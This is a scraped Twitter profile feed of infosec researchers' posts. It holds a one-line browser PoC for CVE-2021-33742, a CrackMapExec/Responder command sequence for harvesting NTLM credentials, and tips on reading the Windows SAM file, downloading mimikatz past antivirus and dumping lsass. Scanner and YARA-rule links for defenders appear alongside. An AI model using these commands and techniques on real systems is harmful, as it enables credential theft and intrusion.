brezel (@br3zel) 's Twitter Profile
brezel

@br3zel

IT-Security, ArchLinux Enthusiast, More music..

ID: 323690670

linkhttps://www.youtube.com/watch?v=FZT62Gbb3iE calendar_today25-06-2011 07:39:36

641 Tweet

198 Takipçi

797 Takip Edilen

Quarks (@quarkswdr) 's Twitter Profile Photo

Erst ein krasses Tabu – und irgendwann empört sich keiner mehr. Dafür gibt's einen einfachen Trick. Aus aktuellem Anlass.

Ivan Fratric 💙💛 (@ifsecure) 's Twitter Profile Photo

CVE-2021-33742 tweetable PoC: <script> var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script>

Jonas L (@jonaslyk) 's Twitter Profile Photo

yarh- for some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file like this: I dont know the full extent of the issue yet, but its too many to not be a problem I think.

yarh- for some reason on win11 the SAM file now is READ for users.
So if you have shadowvolumes enabled you can read the sam file like this:

I dont know the full extent of the issue yet, but its too many to not be a problem I think.
Maximus (@gladiatx0r) 's Twitter Profile Photo

I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️ gist.github.com/gladiatx0r/1ff…

Florian Roth ⚡️ (@cyb3rops) 's Twitter Profile Photo

For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently THOR Lite nextron-systems.com/thor-lite/ YARA rules github.com/Neo23x0/signat… github.com/Neo23x0/signat…

For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner

We've added all rules &amp; IOCs relevant to #ProxyShell exploitation &amp; update them frequently

THOR Lite
nextron-systems.com/thor-lite/

YARA rules
github.com/Neo23x0/signat…
github.com/Neo23x0/signat…
mpgn (@mpgn_x64) 's Twitter Profile Photo

In case you want to see something cool about CrackMapExec and Responder 😌😋 1⃣ cme smb <ip> -u user -p pass --shares 2⃣ Responder -I eth0 3⃣ cme smb <ip> -u user -p pass -M slinky -o ... Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥 🪂

In case you want to see something cool about CrackMapExec and Responder 😌😋

1⃣ cme smb &lt;ip&gt; -u user -p pass --shares
2⃣ Responder -I eth0
3⃣ cme smb &lt;ip&gt; -u user -p pass -M slinky -o ...

Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥

🪂
Elliot (@elliotkillick) 's Twitter Profile Photo

Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!

The Hacker's Choice (@thc@infosec.exchange) (@hackerschoice) 's Twitter Profile Photo

Threema does not have forward secrecy (soatok.blog/2021/11/05/thr…) and local keys are stored insecurely. DROPPED from tiny.cc/thcstfu. Stay safe. #privacy #COP26

mpgn (@mpgn_x64) 's Twitter Profile Photo

Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀 I've integrated them to CrackMapExec as module: 1⃣ -M handlekatz 2⃣ -M nanodump 3⃣ -M procdump (as bonus 😝) (dmp parsed by pypykatz from SkelSec ) Available on Porchetta Industries 🪂

Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀

I've integrated them to CrackMapExec as module:
1⃣ -M handlekatz 
2⃣ -M nanodump
3⃣ -M procdump (as bonus 😝)
(dmp parsed by pypykatz from <a href="/SkelSec/">SkelSec</a> )

Available on <a href="/porchetta_ind/">Porchetta Industries</a> 🪂
diversenok (@diversenok_zero) 's Twitter Profile Photo

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

Niklaus Schiess (@_takeshix) 's Twitter Profile Photo

My latest North Korea research with Martyn Williams is now publicly available: lumen.global/reveal-report Also added it to the DB: dprktech.adversec.com/post/project-r…

Velociraptor (@velocidex) 's Twitter Profile Photo

Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed. youtube.com/watch?v=WWB5xe…

Lukas Klein | @rantasec.bsky.social (@rantasec) 's Twitter Profile Photo

Check out GoLinHound: - Discovers Linux & SSH attack paths - Outputs OpenGraph JSON for BloodHound ingestion - Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths github.com/RantaSec/golin…